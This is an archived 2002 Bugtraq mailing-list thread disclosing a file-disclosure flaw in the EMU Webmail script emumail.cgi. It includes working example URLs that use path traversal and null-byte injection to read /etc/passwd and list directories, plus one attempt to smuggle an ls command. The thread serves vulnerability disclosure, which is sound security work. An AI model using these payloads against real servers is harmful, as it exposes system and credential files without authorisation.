[25003] in bugtraq
Re: emumail.cgi
daemon@ATHENA.MIT.EDU (MegaHz)
Mon Apr 8 23:37:08 2002
Message-ID: <00e801c1dd68$11f2d9f0$0100a8c0@MEGAHZ>
From: "MegaHz" <admin@cyhackportal.com>
To: <bugtraq@securityfocus.com>
Cc: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
Date: Sat, 6 Apr 2002 15:39:15 +0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
u can also do this:
http://site/emumail.cgi?type=/../../../../../etc/passwd%00
but u cannot do this:
http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00
/*
* Andreas Constantinides (MegaHz)
* Admin of cHp (www.cyhackportal.com)
*
*/
----- Original Message -----
From: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
To: <bugtraq@securityfocus.org>
Sent: Friday, April 05, 2002 3:10 AM
Subject: Re: emumail.cgi
> >name : emumail.cgi
> >date : 04/04/2002
> >description : EMU Webmail: how to check your email
> >from the web.
> >severity : Low/average-risk
> >homepage : www.emumail.com
> >
> >Any user can view files on the remote system:
> >xxx/PATH/emumail.cgi?type=FILE%00
> >
> >
> >
> >The vendor were contact about that
> >
>
> http://site/emumail.cgi?type=.%00
>
> Seems to give the directory index of the current directory.
>
> http://site/emumail.cgi?type=..%00
>
> Seems to give the directory index of ../
>
> --
> N|ghtHawk
> http://www.hackers4hackers.org
>
>
>
>
